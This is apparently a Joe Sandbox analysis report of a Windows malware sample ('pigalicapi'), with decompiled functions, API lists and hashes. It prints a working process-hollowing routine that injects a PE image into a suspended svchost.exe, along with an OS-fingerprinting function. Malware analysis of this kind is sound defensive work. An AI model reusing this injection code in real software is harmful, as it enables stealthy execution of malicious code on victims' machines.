                                                                                                                                                                                                                                                                            0x01174bf9

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 01174BAC
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 01174BDB
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(0000EA60,0000000A), ref: 01174C19
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 01174C49
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 01174C60
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 01174C77
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 011756F0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocVirtual$EventInitializeObjectSingleUninitializeWait
                                                                                                                                                                                                                                                                            • String ID: $`$http://www.%s$pigalicapi
                                                                                                                                                                                                                                                                            • API String ID: 1834614700-967124566
                                                                                                                                                                                                                                                                            • Opcode ID: 7463a0c42c9542ae564ec36fa23f869102937b0f182aaccf9b75e0ab67a75a6a
                                                                                                                                                                                                                                                                            • Instruction ID: b08d00ee1414dd50c6cc6c9e0a13c276c1d0ef8447f3eea969b7ad951f0645b6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7463a0c42c9542ae564ec36fa23f869102937b0f182aaccf9b75e0ab67a75a6a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E062BCB5D00218EBEB19DB94EC84FEDB775BF49309F048199F60967381E7309A85CBA1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 204 1178f80-1178f94 205 117927b-1179281 204->205 206 1178f9a-1178f9e 204->206 206->205 207 1178fa4-1178fa8 206->207 207->205 208 1178fae-1178fff call 1177d20 * 3 GetVersionExA 207->208 215 1179266-117926a 208->215 216 1179005-1179016 GetSystemInfo 208->216 215->205 217 117926c-1179275 lstrcatA 215->217 218 1179115-117911c 216->218 219 117901c-1179023 216->219 217->205 220 1179122-1179129 218->220 221 1179210-1179217 call 1179290 218->221 222 1179025-117903d lstrcatA 219->222 223 1179042-1179049 219->223 224 1179174-117917b 220->224 225 117912b-1179132 220->225 238 1179219-1179222 lstrcatA 221->238 239 1179228-1179237 lstrlenA 221->239 227 1179110 222->227 228 117904b-1179063 lstrcatA 223->228 229 1179068-117906f 223->229 231 11791c3-11791ca 224->231 232 117917d-1179184 224->232 233 1179134-117914c lstrcatA 225->233 234 117914e-1179155 225->234 227->221 228->227 229->227 230 1179075-117907c 229->230 240 11790a1-11790ab GetSystemMetrics 230->240 241 117907e-1179085 230->241 231->221 244 11791cc-11791d3 231->244 242 1179186-117919e lstrcatA 232->242 243 11791a0-11791a7 232->243 237 117916f 233->237 236 1179157-1179169 lstrcatA 234->236 234->237 236->237 237->221 238->239 245 1179259-1179263 lstrlenA 239->245 246 1179239-1179253 lstrcatA * 2 239->246 248 11790c7-11790d1 GetSystemMetrics 240->248 249 11790ad-11790c5 lstrcatA 240->249 241->240 247 1179087-117909f lstrcatA 241->247 250 11791c1 242->250 243->250 251 11791a9-11791bb lstrcatA 243->251 252 11791d5-11791ed lstrcatA 244->252 253 11791ef-11791f6 244->253 245->215 246->245 247->227 254 11790d3-11790eb lstrcatA 248->254 255 11790ed-11790f6 248->255 249->227 250->221 251->250 252->221 253->221 256 11791f8-117920a lstrcatA 253->256 254->227 255->227 257 11790f8-117910a lstrcatA 255->257 256->221 257->227
                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01178F80(CHAR* _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                                            				struct _SYSTEM_INFO _v44;
                                                                                                                                                                                                                                                                            				signed int _v50;
                                                                                                                                                                                                                                                                            				signed short _v52;
                                                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v204;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                                            					L45:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					E01177D20(E01177D20(_a8, _a4, 0, _a8),  &_v204, 0, 0x9c);
                                                                                                                                                                                                                                                                            					_v204.dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                                                                                                                            					E01177D20( &_v44,  &_v44, 0, 0x24);
                                                                                                                                                                                                                                                                            					if(GetVersionExA( &_v204) == 0) {
                                                                                                                                                                                                                                                                            						L43:
                                                                                                                                                                                                                                                                            						if(_v8 == 0) {
                                                                                                                                                                                                                                                                            							lstrcatA(_a4, "UndefinedOS");
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L45;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					GetSystemInfo( &_v44); // executed
                                                                                                                                                                                                                                                                            					if(_v204.dwMajorVersion != 5) {
                                                                                                                                                                                                                                                                            						if(_v204.dwMajorVersion == 6) {
                                                                                                                                                                                                                                                                            							if(_v204.dwMinorVersion != 0) {
                                                                                                                                                                                                                                                                            								if(_v204.dwMinorVersion != 1) {
                                                                                                                                                                                                                                                                            									if(_v204.dwMinorVersion == 2) {
                                                                                                                                                                                                                                                                            										if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                            											if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                            												lstrcatA(_a4, "Win8");
                                                                                                                                                                                                                                                                            												 *_a12 = 0xb;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											lstrcatA(_a4, "WinServer2012");
                                                                                                                                                                                                                                                                            											 *_a12 = 0xc;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                            										if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                            											lstrcatA(_a4, "Win7");
                                                                                                                                                                                                                                                                            											 *_a12 = 8;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										lstrcatA(_a4, "WinServer2008R2");
                                                                                                                                                                                                                                                                            										 *_a12 = 0xa;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								if((_v50 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                            									if((_v50 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                            										lstrcatA(_a4, "WinServer2008");
                                                                                                                                                                                                                                                                            										 *_a12 = 9;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									lstrcatA(_a4, "Vista");
                                                                                                                                                                                                                                                                            									 *_a12 = 7;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						L38:
                                                                                                                                                                                                                                                                            						if(E01179290() != 0) {
                                                                                                                                                                                                                                                                            							lstrcatA(_a4, "_x64");
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(lstrlenA( &(_v204.szCSDVersion)) != 0) {
                                                                                                                                                                                                                                                                            							lstrcatA(_a4, "_");
                                                                                                                                                                                                                                                                            							lstrcatA(_a4,  &(_v204.szCSDVersion));
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v8 = lstrlenA(_a4);
                                                                                                                                                                                                                                                                            						goto L43;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v204.dwMinorVersion != 0) {
                                                                                                                                                                                                                                                                            						if(_v204.dwMinorVersion != 1) {
                                                                                                                                                                                                                                                                            							if(_v204.dwMinorVersion == 2) {
                                                                                                                                                                                                                                                                            								if((_v50 & 0x000000ff) != 1 || (_v44.dwOemId & 0x0000ffff) != 9) {
                                                                                                                                                                                                                                                                            									if(GetSystemMetrics(0x59) != 0) {
                                                                                                                                                                                                                                                                            										if(GetSystemMetrics(0x59) == 0) {
                                                                                                                                                                                                                                                                            											if((_v52 & 0x8000) != 0) {
                                                                                                                                                                                                                                                                            												lstrcatA(_a4, "WinHomeServer");
                                                                                                                                                                                                                                                                            												 *_a12 = 4;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											lstrcatA(_a4, "WinServer2003R2");
                                                                                                                                                                                                                                                                            											 *_a12 = 6;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										lstrcatA(_a4, "WinServer2003");
                                                                                                                                                                                                                                                                            										 *_a12 = 5;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									lstrcatA(_a4, "WinXP64");
                                                                                                                                                                                                                                                                            									 *_a12 = 3;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							lstrcatA(_a4, "WinXP");
                                                                                                                                                                                                                                                                            							 *_a12 = 2;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						lstrcatA(_a4, "Win2K");
                                                                                                                                                                                                                                                                            						 *_a12 = 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L38;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                                                            0x01178f89
                                                                                                                                                                                                                                                                            0x01178f94
                                                                                                                                                                                                                                                                            0x0117927b
                                                                                                                                                                                                                                                                            0x01179281
                                                                                                                                                                                                                                                                            0x01178fae
                                                                                                                                                                                                                                                                            0x01178fce
                                                                                                                                                                                                                                                                            0x01178fd6
                                                                                                                                                                                                                                                                            0x01178fe8
                                                                                                                                                                                                                                                                            0x01178fff
                                                                                                                                                                                                                                                                            0x01179266
                                                                                                                                                                                                                                                                            0x0117926a
                                                                                                                                                                                                                                                                            0x01179275
                                                                                                                                                                                                                                                                            0x01179275
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117926a
                                                                                                                                                                                                                                                                            0x01179009
                                                                                                                                                                                                                                                                            0x01179016
                                                                                                                                                                                                                                                                            0x0117911c
                                                                                                                                                                                                                                                                            0x01179129
                                                                                                                                                                                                                                                                            0x0117917b
                                                                                                                                                                                                                                                                            0x011791ca
                                                                                                                                                                                                                                                                            0x011791d3
                                                                                                                                                                                                                                                                            0x011791f6
                                                                                                                                                                                                                                                                            0x01179201
                                                                                                                                                                                                                                                                            0x0117920a
                                                                                                                                                                                                                                                                            0x0117920a
                                                                                                                                                                                                                                                                            0x011791d5
                                                                                                                                                                                                                                                                            0x011791de
                                                                                                                                                                                                                                                                            0x011791e7
                                                                                                                                                                                                                                                                            0x011791e7
                                                                                                                                                                                                                                                                            0x011791d3
                                                                                                                                                                                                                                                                            0x0117917d
                                                                                                                                                                                                                                                                            0x01179184
                                                                                                                                                                                                                                                                            0x011791a7
                                                                                                                                                                                                                                                                            0x011791b2
                                                                                                                                                                                                                                                                            0x011791bb
                                                                                                                                                                                                                                                                            0x011791bb
                                                                                                                                                                                                                                                                            0x01179186
                                                                                                                                                                                                                                                                            0x0117918f
                                                                                                                                                                                                                                                                            0x01179198
                                                                                                                                                                                                                                                                            0x01179198
                                                                                                                                                                                                                                                                            0x011791c1
                                                                                                                                                                                                                                                                            0x0117912b
                                                                                                                                                                                                                                                                            0x01179132
                                                                                                                                                                                                                                                                            0x01179155
                                                                                                                                                                                                                                                                            0x01179160
                                                                                                                                                                                                                                                                            0x01179169
                                                                                                                                                                                                                                                                            0x01179169
                                                                                                                                                                                                                                                                            0x01179134
                                                                                                                                                                                                                                                                            0x0117913d
                                                                                                                                                                                                                                                                            0x01179146
                                                                                                                                                                                                                                                                            0x01179146
                                                                                                                                                                                                                                                                            0x0117916f
                                                                                                                                                                                                                                                                            0x01179129
                                                                                                                                                                                                                                                                            0x01179210
                                                                                                                                                                                                                                                                            0x01179217
                                                                                                                                                                                                                                                                            0x01179222
                                                                                                                                                                                                                                                                            0x01179222
                                                                                                                                                                                                                                                                            0x01179237
                                                                                                                                                                                                                                                                            0x01179242
                                                                                                                                                                                                                                                                            0x01179253
                                                                                                                                                                                                                                                                            0x01179253
                                                                                                                                                                                                                                                                            0x01179263
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01179263
                                                                                                                                                                                                                                                                            0x01179023
                                                                                                                                                                                                                                                                            0x01179049
                                                                                                                                                                                                                                                                            0x0117906f
                                                                                                                                                                                                                                                                            0x0117907c
                                                                                                                                                                                                                                                                            0x011790ab
                                                                                                                                                                                                                                                                            0x011790d1
                                                                                                                                                                                                                                                                            0x011790f6
                                                                                                                                                                                                                                                                            0x01179101
                                                                                                                                                                                                                                                                            0x0117910a
                                                                                                                                                                                                                                                                            0x0117910a
                                                                                                                                                                                                                                                                            0x011790d3
                                                                                                                                                                                                                                                                            0x011790dc
                                                                                                                                                                                                                                                                            0x011790e5
                                                                                                                                                                                                                                                                            0x011790e5
                                                                                                                                                                                                                                                                            0x011790ad
                                                                                                                                                                                                                                                                            0x011790b6
                                                                                                                                                                                                                                                                            0x011790bf
                                                                                                                                                                                                                                                                            0x011790bf
                                                                                                                                                                                                                                                                            0x01179087
                                                                                                                                                                                                                                                                            0x01179090
                                                                                                                                                                                                                                                                            0x01179099
                                                                                                                                                                                                                                                                            0x01179099
                                                                                                                                                                                                                                                                            0x0117907c
                                                                                                                                                                                                                                                                            0x0117904b
                                                                                                                                                                                                                                                                            0x01179054
                                                                                                                                                                                                                                                                            0x0117905d
                                                                                                                                                                                                                                                                            0x0117905d
                                                                                                                                                                                                                                                                            0x01179025
                                                                                                                                                                                                                                                                            0x0117902e
                                                                                                                                                                                                                                                                            0x01179037
                                                                                                                                                                                                                                                                            0x01179037
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01179110

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(0000009C), ref: 01178FF7
                                                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 01179009
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,Win2K), ref: 0117902E
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,WinXP), ref: 01179054
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,Vista), ref: 0117913D
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,WinServer2008), ref: 01179160
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,WinServer2008R2), ref: 0117918F
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,Win7), ref: 011791B2
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,WinServer2012), ref: 011791DE
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,Win8), ref: 01179201
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,_x64), ref: 01179222
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0117922F
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,0117C980), ref: 01179242
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 01179253
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0117925D
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 01179275
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcat$lstrlen$InfoSystemVersion
                                                                                                                                                                                                                                                                            • String ID: UndefinedOS$Vista$Win2K$Win7$Win8$WinHomeServer$WinServer2003$WinServer2003R2$WinServer2008$WinServer2008R2$WinServer2012$WinXP$WinXP64$_x64
                                                                                                                                                                                                                                                                            • API String ID: 3139318632-332591429
                                                                                                                                                                                                                                                                            • Opcode ID: 1f97d65494c45aa5efca274910a8f657b4c69020d71b05a8bdd873818c7bd980
                                                                                                                                                                                                                                                                            • Instruction ID: 9eeab9d105fddda97bc28fa3c00f1918060afdb44611ab7b93ea7ee0738bf40a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f97d65494c45aa5efca274910a8f657b4c69020d71b05a8bdd873818c7bd980
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4818CB864030EEBDB2D9F64D849BAE7B75BB06329F108958F915A6380D774C5C4CBE0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E011720B0(intOrPtr _a4, signed char _a8, CHAR* _a12) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                                                            				struct _CONTEXT _v996;
                                                                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v1012;
                                                                                                                                                                                                                                                                            				intOrPtr _v1016;
                                                                                                                                                                                                                                                                            				struct _STARTUPINFOA _v1092;
                                                                                                                                                                                                                                                                            				intOrPtr _v1096;
                                                                                                                                                                                                                                                                            				void _v1100;
                                                                                                                                                                                                                                                                            				signed int _v1104;
                                                                                                                                                                                                                                                                            				CHAR* _t121;
                                                                                                                                                                                                                                                                            				void* _t128;
                                                                                                                                                                                                                                                                            				int _t130;
                                                                                                                                                                                                                                                                            				void* _t132;
                                                                                                                                                                                                                                                                            				int _t140;
                                                                                                                                                                                                                                                                            				int _t143;
                                                                                                                                                                                                                                                                            				int _t145;
                                                                                                                                                                                                                                                                            				int _t148;
                                                                                                                                                                                                                                                                            				void* _t263;
                                                                                                                                                                                                                                                                            				void* _t265;
                                                                                                                                                                                                                                                                            				void* _t266;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				if(_a4 == 0) {
                                                                                                                                                                                                                                                                            					L26:
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				GetEnvironmentVariableA("SystemRoot",  &_v276, 0x104);
                                                                                                                                                                                                                                                                            				_t121 = lstrcatA( &_v276, "\\system32\\svchost.exe");
                                                                                                                                                                                                                                                                            				if(_a12 != 0) {
                                                                                                                                                                                                                                                                            					lstrcatA( &_v276, " ");
                                                                                                                                                                                                                                                                            					_t121 = lstrcatA( &_v276, _a12);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E01177D20(_t121,  &_v1012, 0, 0x10);
                                                                                                                                                                                                                                                                            				E01177D20( &_v1092,  &_v1092, 0, 0x44);
                                                                                                                                                                                                                                                                            				_t265 = _t263 + 0x18;
                                                                                                                                                                                                                                                                            				_v1092.cb = 0x44;
                                                                                                                                                                                                                                                                            				_v1096 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                            				_v1016 = _v1096 + ( *(_v1096 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                            				_v8 =  *((intOrPtr*)(_v1096 + 0x50));
                                                                                                                                                                                                                                                                            				_t128 = VirtualAlloc(0, _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                            				_v12 = _t128;
                                                                                                                                                                                                                                                                            				if(_v12 != 0) {
                                                                                                                                                                                                                                                                            					_t130 = CreateProcessA(0,  &_v276, 0, 0, 0, 4, 0, 0,  &_v1092,  &_v1012); // executed
                                                                                                                                                                                                                                                                            					if(_t130 != 0) {
                                                                                                                                                                                                                                                                            						_t132 = VirtualAllocEx(_v1012.hProcess,  *(_v1096 + 0x34), _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                            						_v1100 = _t132;
                                                                                                                                                                                                                                                                            						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                            							L10:
                                                                                                                                                                                                                                                                            							E01177B70(_v12, _a4,  *((intOrPtr*)(_v1096 + 0x54)));
                                                                                                                                                                                                                                                                            							_t266 = _t265 + 0xc;
                                                                                                                                                                                                                                                                            							_v1104 = 0;
                                                                                                                                                                                                                                                                            							while(_v1104 < ( *(_v1096 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                            								if((_a8 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            									E01177B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                            									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									E01177B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0x14 + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                            									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v1104 = _v1104 + 1;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							E011726D0(_v12, _v1100);
                                                                                                                                                                                                                                                                            							_t140 = WriteProcessMemory(_v1012.hProcess, _v1100, _v12, _v8, 0); // executed
                                                                                                                                                                                                                                                                            							if(_t140 != 0) {
                                                                                                                                                                                                                                                                            								VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            								_v996.ContextFlags = 0x10007;
                                                                                                                                                                                                                                                                            								_t143 = GetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                            								if(_t143 != 0) {
                                                                                                                                                                                                                                                                            									_t145 = WriteProcessMemory(_v1012.hProcess, _v996.Ebx + 8,  &_v1100, 4, 0); // executed
                                                                                                                                                                                                                                                                            									if(_t145 != 0) {
                                                                                                                                                                                                                                                                            										_v996.Eax = _v1100 +  *((intOrPtr*)(_v1096 + 0x28));
                                                                                                                                                                                                                                                                            										_t148 = SetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                            										if(_t148 == 0) {
                                                                                                                                                                                                                                                                            											TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                            											CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                            											CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                            											goto L26;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										ResumeThread(_v1012.hThread); // executed
                                                                                                                                                                                                                                                                            										return _v1012.hProcess;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                            									CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                            									CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                            									return 0;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                            								CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                            								CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                            								return 0;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                            							CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                            							CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                            							VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                            							return 0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v1100 = VirtualAllocEx(_v1012.hProcess, 0, _v8, 0x103000, 0x40);
                                                                                                                                                                                                                                                                            						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                            							goto L10;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                            						CloseHandle(_v1012);
                                                                                                                                                                                                                                                                            						CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                            						VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                                                                            0x011720bd
                                                                                                                                                                                                                                                                            0x01172502
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01172502
                                                                                                                                                                                                                                                                            0x011720d4
                                                                                                                                                                                                                                                                            0x011720e6
                                                                                                                                                                                                                                                                            0x011720f0
                                                                                                                                                                                                                                                                            0x011720fe
                                                                                                                                                                                                                                                                            0x0117210f
                                                                                                                                                                                                                                                                            0x0117210f
                                                                                                                                                                                                                                                                            0x01172120
                                                                                                                                                                                                                                                                            0x01172133
                                                                                                                                                                                                                                                                            0x01172138
                                                                                                                                                                                                                                                                            0x0117213b
                                                                                                                                                                                                                                                                            0x0117214e
                                                                                                                                                                                                                                                                            0x01172168
                                                                                                                                                                                                                                                                            0x01172177
                                                                                                                                                                                                                                                                            0x01172187
                                                                                                                                                                                                                                                                            0x0117218d
                                                                                                                                                                                                                                                                            0x01172194
                                                                                                                                                                                                                                                                            0x011721c0
                                                                                                                                                                                                                                                                            0x011721c8
                                                                                                                                                                                                                                                                            0x011721fe
                                                                                                                                                                                                                                                                            0x01172204
                                                                                                                                                                                                                                                                            0x01172211
                                                                                                                                                                                                                                                                            0x0117227d
                                                                                                                                                                                                                                                                            0x0117228f
                                                                                                                                                                                                                                                                            0x01172294
                                                                                                                                                                                                                                                                            0x01172297
                                                                                                                                                                                                                                                                            0x011722b2
                                                                                                                                                                                                                                                                            0x011722ce
                                                                                                                                                                                                                                                                            0x0117235e
                                                                                                                                                                                                                                                                            0x01172363
                                                                                                                                                                                                                                                                            0x011722d0
                                                                                                                                                                                                                                                                            0x01172312
                                                                                                                                                                                                                                                                            0x01172317
                                                                                                                                                                                                                                                                            0x01172317
                                                                                                                                                                                                                                                                            0x011722ac
                                                                                                                                                                                                                                                                            0x011722ac
                                                                                                                                                                                                                                                                            0x01172376
                                                                                                                                                                                                                                                                            0x01172396
                                                                                                                                                                                                                                                                            0x0117239e
                                                                                                                                                                                                                                                                            0x011723ec
                                                                                                                                                                                                                                                                            0x011723f2
                                                                                                                                                                                                                                                                            0x0117240a
                                                                                                                                                                                                                                                                            0x01172412
                                                                                                                                                                                                                                                                            0x01172460
                                                                                                                                                                                                                                                                            0x01172468
                                                                                                                                                                                                                                                                            0x011724a6
                                                                                                                                                                                                                                                                            0x011724ba
                                                                                                                                                                                                                                                                            0x011724c2
                                                                                                                                                                                                                                                                            0x011724e2
                                                                                                                                                                                                                                                                            0x011724ef
                                                                                                                                                                                                                                                                            0x011724fc
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011724fc
                                                                                                                                                                                                                                                                            0x011724cb
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011724d1
                                                                                                                                                                                                                                                                            0x01172473
                                                                                                                                                                                                                                                                            0x01172480
                                                                                                                                                                                                                                                                            0x0117248d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01172493
                                                                                                                                                                                                                                                                            0x0117241d
                                                                                                                                                                                                                                                                            0x0117242a
                                                                                                                                                                                                                                                                            0x01172437
